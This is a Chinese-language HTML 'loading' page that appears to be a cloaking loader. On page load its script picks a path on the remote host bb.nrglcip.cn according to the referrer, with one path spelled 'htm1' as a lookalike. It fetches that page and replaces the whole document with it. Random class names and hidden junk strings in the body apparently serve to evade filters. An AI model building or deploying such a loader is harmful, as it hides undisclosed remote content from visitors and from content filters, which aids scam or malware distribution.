<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .o4j6zm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .o4j6zm .Lux5pe4MD2Q {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .o4j6zm .content {
            line-height: 50px;
            text-align: center
        }

        .o4j6zm .img {
            width: 100%
        }

        .o4j6zm .fp0JoxXv {
            text-align: center
        }

        .o4j6zm .fp0JoxXv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .o4j6zm .fp0JoxXv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .o4j6zm .fp0JoxXv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .o4j6zm .fp0JoxXv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .o4j6zm .fp0JoxXv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .o4j6zm .fp0JoxXv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .o4j6zm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tVHx96xNbW8o(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ywzGd = tVHx96xNbW8o('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ywzGd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ywzGd +".html?a=share";
		}
		
        fh1Tu4bqE=url+"#"+new Date().getTime();
        fh1Tu4bqE && function() {
            $.get(fh1Tu4bqE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>TaupDZcpoYQJX0ouCEW5NufpeZhHIOnEBG1ioC63N4T0M9Ri</span>
<div style='display:none'>rQrzHBn6j4MljPKsvS3O</div>
<span style='display:none'>TaupDZcpoYQJX0ouCEW5NufpeZhHIOnEBG1ioC63N4T0M9Ri</span>
<li style='display:none' >EziW0oDPX3wez9cJbjllFn5ZQ4</li>
<img  src='' style='display:none'><div class="o4j6zm">
    <div class="Lux5pe4MD2Q">
        <div class="fp0JoxXv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>QRdB6nSqxXU1yWdtSjNiptOmJRK6bTGIwix8OFOGw2Us2WSMrWDUIF6K3QPwoInqn2pr4GQN8PkQRiNFErlhOIhkDtH7sHuKXD</a>
<div style='display:none'>FHHGM3O4yaULwKoTgMD1YKZWpKBe81yhxeM6CxvhYhWQRkESd94BO</div>
<div style='display:none'>FHHGM3O4yaULwKoTgMD1YKZWpKBe81yhxeM6CxvhYhWQRkESd94BO</div></body>
</html>